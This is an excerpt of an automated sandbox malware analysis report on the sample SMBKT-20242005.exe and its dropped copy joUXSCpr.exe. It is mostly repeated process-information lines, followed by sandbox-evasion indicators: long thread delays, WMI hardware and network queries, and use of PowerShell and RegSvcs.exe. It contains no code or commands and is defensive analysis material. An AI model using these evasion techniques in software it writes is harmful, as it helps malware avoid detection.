                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: joUXSCpr.exe PID: 7852, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: 1370000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: 2D70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: 4D70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: 9010000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: A010000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: A220000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: B220000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: B630000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Memory allocated: C630000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 2A30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 2C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 4C30000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 8A80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 9A80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: AC80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: B070000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Memory allocated: C070000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 8181
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1449
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 471
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 1718
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 944
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 4734
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exe TID: 7428; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7832; Thread sleep time: -6456360425798339s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exe TID: 7876; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
